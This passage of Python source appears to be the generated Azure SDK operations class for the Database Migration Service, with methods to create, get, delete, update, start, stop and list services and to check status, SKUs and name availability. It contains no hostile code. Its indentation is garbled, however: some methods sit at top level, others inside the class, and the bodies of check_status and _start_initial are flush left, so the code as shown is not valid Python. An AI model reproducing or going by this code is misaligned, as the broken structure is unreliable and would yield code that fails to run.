    ("ServiceIsBusy"). The provider will reply when successful with 200 OK
    or 201 Created. Long-running operations use the provisioningState
    property.

    :param parameters: Information about the service
    :type parameters:
     ~azure.mgmt.datamigration.models.DataMigrationService
    :param group_name: Name of the resource group
    :type group_name: str
    :param service_name: Name of the service
    :type service_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :return: An instance of AzureOperationPoller that returns
     DataMigrationService or ClientRawResponse if raw=true
    :rtype:
     ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.datamigration.models.DataMigrationService]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
    """
    # Fire the initial PUT; always request raw so the poller closures
    # below can reuse the underlying HTTP response.
    raw_result = self._create_or_update_initial(
        parameters=parameters,
        group_name=group_name,
        service_name=service_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )
    if raw:
        return raw_result

    # Construct and send request
    def long_running_send():
        # The initial response seeds the poller; nothing new is sent.
        return raw_result.response

    def get_long_running_status(status_link, headers=None):
        # Poll the status link, propagating the original correlation id.
        request = self._client.get(status_link)
        if headers:
            request.headers.update(headers)
        header_parameters = {}
        header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
        return self._client.send(
            request, header_parameters, stream=False, **operation_config)

    def get_long_running_output(response):
        # Deserialize the terminal response into the service model.
        if response.status_code not in [200, 201, 202]:
            raise models.ApiErrorException(self._deserialize, response)

        deserialized = self._deserialize('DataMigrationService', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    long_running_operation_timeout = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    return AzureOperationPoller(
        long_running_send, get_long_running_output,
        get_long_running_status, long_running_operation_timeout)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def get(
        self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
    """Get DMS Service Instance.

    Retrieves information about a single Database Migration Service
    instance (the top-level services resource).

    :param group_name: Name of the resource group
    :type group_name: str
    :param service_name: Name of the service
    :type service_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: DataMigrationService or ClientRawResponse if raw=true
    :rtype: ~azure.mgmt.datamigration.models.DataMigrationService or
     ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
    """
    # Expand the URL template with subscription, group and service names.
    path_args = {
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        'groupName': self._serialize.url("group_name", group_name, 'str'),
        'serviceName': self._serialize.url("service_name", service_name, 'str'),
    }
    full_url = self._client.format_url(self.get.metadata['url'], **path_args)

    # Query string carries only the constant API version.
    query = {'api-version': self._serialize.query("self.api_version", self.api_version, 'str')}

    # Request headers: content type, optional tracing and language headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET and validate the status code.
    request = self._client.get(full_url, query)
    response = self._client.send(request, headers, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.ApiErrorException(self._deserialize, response)

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('DataMigrationService', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def _delete_initial(
        self, group_name, service_name, delete_running_tasks=None, custom_headers=None, raw=False, **operation_config):
    """Send the initial DELETE for the service; long-running polling is
    handled by the public `delete` wrapper. Returns a ClientRawResponse
    only when `raw` is true (the DELETE has no body to deserialize).
    """
    # Construct URL
    url = self.delete.metadata['url']
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        'groupName': self._serialize.url("group_name", group_name, 'str'),
        'serviceName': self._serialize.url("service_name", service_name, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    if delete_running_tasks is not None:
        # Optional flag: delete the service even if tasks are running.
        query_parameters['deleteRunningTasks'] = self._serialize.query("delete_running_tasks", delete_running_tasks, 'bool')
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Per-request correlation id for service-side tracing.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.delete(url, query_parameters)
    response = self._client.send(request, header_parameters, stream=False, **operation_config)

    if response.status_code not in [200, 202, 204]:
        raise models.ApiErrorException(self._deserialize, response)

    if raw:
        client_raw_response = ClientRawResponse(None, response)
        return client_raw_response
    def delete(
            self, group_name, service_name, delete_running_tasks=None, custom_headers=None, raw=False, **operation_config):
        """Delete DMS Service Instance.
        The services resource is the top-level resource that represents the
        Database Migration Service. The DELETE method deletes a service. Any
        running tasks will be canceled.
        :param group_name: Name of the resource group
        :type group_name: str
        :param service_name: Name of the service
        :type service_name: str
        :param delete_running_tasks: Delete the resource even if it contains
         running tasks
        :type delete_running_tasks: bool
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An instance of AzureOperationPoller that returns None or
         ClientRawResponse if raw=true
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        raw_result = self._delete_initial(
            group_name=group_name,
            service_name=service_name,
            delete_running_tasks=delete_running_tasks,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result
        # Construct and send request
        def long_running_send():
            # The initial DELETE was already sent above; hand its response to the poller.
            return raw_result.response
        def get_long_running_status(status_link, headers=None):
            # Poll the async status link, propagating the original correlation id.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)
        def get_long_running_output(response):
            # Validate the terminal status; the delete operation has no body.
            if response.status_code not in [200, 202, 204]:
                raise models.ApiErrorException(self._deserialize, response)
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
    def _update_initial(
            self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
        """Send the initial PATCH request of the long-running update operation.
        Returns the deserialized DataMigrationService on a 200 response, None
        on 202 (still in progress), or a ClientRawResponse when ``raw`` is
        True; completion is tracked by the poller built in :meth:`update`.
        """
        # Construct URL
        url = self.update.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 supplies a per-request correlation id for service-side tracing
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(parameters, 'DataMigrationService')
        # Construct and send request
        request = self._client.patch(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)
        if response.status_code not in [200, 202]:
            raise models.ApiErrorException(self._deserialize, response)
        deserialized = None
        # 202 Accepted carries no service body yet; only 200 is deserialized
        if response.status_code == 200:
            deserialized = self._deserialize('DataMigrationService', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def update(
            self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
        """Create or update DMS Service Instance.
        The services resource is the top-level resource that represents the
        Database Migration Service. The PATCH method updates an existing
        service. This method can change the kind, SKU, and network of the
        service, but if tasks are currently running (i.e. the service is busy),
        this will fail with 400 Bad Request ("ServiceIsBusy").
        :param parameters: Information about the service
        :type parameters:
         ~azure.mgmt.datamigration.models.DataMigrationService
        :param group_name: Name of the resource group
        :type group_name: str
        :param service_name: Name of the service
        :type service_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An instance of AzureOperationPoller that returns
         DataMigrationService or ClientRawResponse if raw=true
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.datamigration.models.DataMigrationService]
         or ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        raw_result = self._update_initial(
            parameters=parameters,
            group_name=group_name,
            service_name=service_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result
        # Construct and send request
        def long_running_send():
            # The initial PATCH was already sent above; hand its response to the poller.
            return raw_result.response
        def get_long_running_status(status_link, headers=None):
            # Poll the async status link, propagating the original correlation id.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)
        def get_long_running_output(response):
            # Validate the terminal status and deserialize the updated service.
            if response.status_code not in [200, 202]:
                raise models.ApiErrorException(self._deserialize, response)
            deserialized = self._deserialize('DataMigrationService', response)
            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response
            return deserialized
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def check_status(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Check service health status.
The services resource is the top-level resource that represents the
Database Migration Service. This action performs a health check and
returns the status of the service and virtual machine size.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DataMigrationServiceStatusResponse or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.datamigration.models.DataMigrationServiceStatusResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
# Construct URL
url = self.check_status.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataMigrationServiceStatusResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_status.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkStatus'}
def _start_initial(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.start.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
    def start(
            self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
        """Start service.
        The services resource is the top-level resource that represents the
        Database Migration Service. This action starts the service and the
        service can be used for data migration.
        :param group_name: Name of the resource group
        :type group_name: str
        :param service_name: Name of the service
        :type service_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An instance of AzureOperationPoller that returns None or
         ClientRawResponse if raw=true
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        raw_result = self._start_initial(
            group_name=group_name,
            service_name=service_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result
        # Construct and send request
        def long_running_send():
            # The initial POST was already sent above; hand its response to the poller.
            return raw_result.response
        def get_long_running_status(status_link, headers=None):
            # Poll the async status link, propagating the original correlation id.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)
        def get_long_running_output(response):
            # Validate the terminal status; the start operation has no body.
            if response.status_code not in [200, 202]:
                raise models.ApiErrorException(self._deserialize, response)
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/start'}
    def _stop_initial(
            self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
        """Send the initial POST that kicks off the long-running stop operation.
        Returns a ClientRawResponse when ``raw`` is True; otherwise returns
        None (completion is tracked by the poller built in :meth:`stop`).
        """
        # Construct URL
        url = self.stop.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 supplies a per-request correlation id for service-side tracing
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)
        if response.status_code not in [200, 202]:
            raise models.ApiErrorException(self._deserialize, response)
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def stop(
            self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
        """Stop service.
        The services resource is the top-level resource that represents the
        Database Migration Service. This action stops the service and the
        service cannot be used for data migration. The service owner won't be
        billed when the service is stopped.
        :param group_name: Name of the resource group
        :type group_name: str
        :param service_name: Name of the service
        :type service_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An instance of AzureOperationPoller that returns None or
         ClientRawResponse if raw=true
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        raw_result = self._stop_initial(
            group_name=group_name,
            service_name=service_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result
        # Construct and send request
        def long_running_send():
            # The initial POST was already sent above; hand its response to the poller.
            return raw_result.response
        def get_long_running_status(status_link, headers=None):
            # Poll the async status link, propagating the original correlation id.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)
        def get_long_running_output(response):
            # Validate the terminal status; the stop operation has no body.
            if response.status_code not in [200, 202]:
                raise models.ApiErrorException(self._deserialize, response)
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/stop'}
    def list_skus(
            self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
        """Get compatible SKUs.
        The services resource is the top-level resource that represents the
        Database Migration Service. The skus action returns the list of SKUs
        that a service resource can be updated to.
        :param group_name: Name of the resource group
        :type group_name: str
        :param service_name: Name of the service
        :type service_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of AvailableServiceSku
        :rtype:
         ~azure.mgmt.datamigration.models.AvailableServiceSkuPaged[~azure.mgmt.datamigration.models.AvailableServiceSku]
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        def internal_paging(next_link=None, raw=False):
            # Fetch one page: build the full URL on the first call, then
            # follow the service-supplied next_link for subsequent pages.
            if not next_link:
                # Construct URL
                url = self.list_skus.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'groupName': self._serialize.url("group_name", group_name, 'str'),
                    'serviceName': self._serialize.url("service_name", service_name, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                # next_link already embeds its own query string
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)
            if response.status_code not in [200]:
                raise models.ApiErrorException(self._deserialize, response)
            return response
        # Deserialize response
        deserialized = models.AvailableServiceSkuPaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.AvailableServiceSkuPaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
    list_skus.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/skus'}
    def check_children_name_availability(
            self, group_name, service_name, name=None, type=None, custom_headers=None, raw=False, **operation_config):
        """Check nested resource name validity and availability.
        This method checks whether a proposed nested resource name is valid and
        available.
        :param group_name: Name of the resource group
        :type group_name: str
        :param service_name: Name of the service
        :type service_name: str
        :param name: The proposed resource name
        :type name: str
        :param type: The resource type chain (e.g. virtualMachines/extensions)
        :type type: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: NameAvailabilityResponse or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.datamigration.models.NameAvailabilityResponse or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        # Flat name/type arguments are wrapped into the request model
        parameters = models.NameAvailabilityRequest(name=name, type=type)
        # Construct URL
        url = self.check_children_name_availability.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'groupName': self._serialize.url("group_name", group_name, 'str'),
            'serviceName': self._serialize.url("service_name", service_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(parameters, 'NameAvailabilityRequest')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)
        if response.status_code not in [200]:
            raise models.ApiErrorException(self._deserialize, response)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('NameAvailabilityResponse', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    check_children_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkNameAvailability'}
    def list_by_resource_group(
            self, group_name, custom_headers=None, raw=False, **operation_config):
        """Get services in resource group.
        The Services resource is the top-level resource that represents the
        Database Migration Service. This method returns a list of service
        resources in a resource group.
        :param group_name: Name of the resource group
        :type group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of DataMigrationService
        :rtype:
         ~azure.mgmt.datamigration.models.DataMigrationServicePaged[~azure.mgmt.datamigration.models.DataMigrationService]
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        def internal_paging(next_link=None, raw=False):
            # Fetch one page: build the full URL on the first call, then
            # follow the service-supplied next_link for subsequent pages.
            if not next_link:
                # Construct URL
                url = self.list_by_resource_group.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'groupName': self._serialize.url("group_name", group_name, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                # next_link already embeds its own query string
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)
            if response.status_code not in [200]:
                raise models.ApiErrorException(self._deserialize, response)
            return response
        # Deserialize response
        deserialized = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services'}
    def list(
            self, custom_headers=None, raw=False, **operation_config):
        """Get services in subscription.
        The services resource is the top-level resource that represents the
        Database Migration Service. This method returns a list of service
        resources in a subscription.
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of DataMigrationService
        :rtype:
         ~azure.mgmt.datamigration.models.DataMigrationServicePaged[~azure.mgmt.datamigration.models.DataMigrationService]
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        def internal_paging(next_link=None, raw=False):
            # Fetch one page: build the full URL on the first call, then
            # follow the service-supplied next_link for subsequent pages.
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                # next_link already embeds its own query string
                url = next_link
                query_parameters = {}
            # Construct headers
            header_parameters = {}
            header_parameters['Content-Type'] = 'application/json; charset=utf-8'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
            # Construct and send request
            request = self._client.get(url, query_parameters)
            response = self._client.send(
                request, header_parameters, stream=False, **operation_config)
            if response.status_code not in [200]:
                raise models.ApiErrorException(self._deserialize, response)
            return response
        # Deserialize response
        deserialized = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies)
        if raw:
            header_dict = {}
            client_raw_response = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies, header_dict)
            return client_raw_response
        return deserialized
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/services'}
    def check_name_availability(
            self, location, name=None, type=None, custom_headers=None, raw=False, **operation_config):
        """Check name validity and availability.
        This method checks whether a proposed top-level resource name is valid
        and available.
        :param location: The Azure region of the operation
        :type location: str
        :param name: The proposed resource name
        :type name: str
        :param type: The resource type chain (e.g. virtualMachines/extensions)
        :type type: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: NameAvailabilityResponse or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.datamigration.models.NameAvailabilityResponse or
         ~msrest.pipeline.ClientRawResponse
        :raises:
         :class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
        """
        # Flat name/type arguments are wrapped into the request model
        parameters = models.NameAvailabilityRequest(name=name, type=type)
        # Construct URL
        url = self.check_name_availability.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'location': self._serialize.url("location", location, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
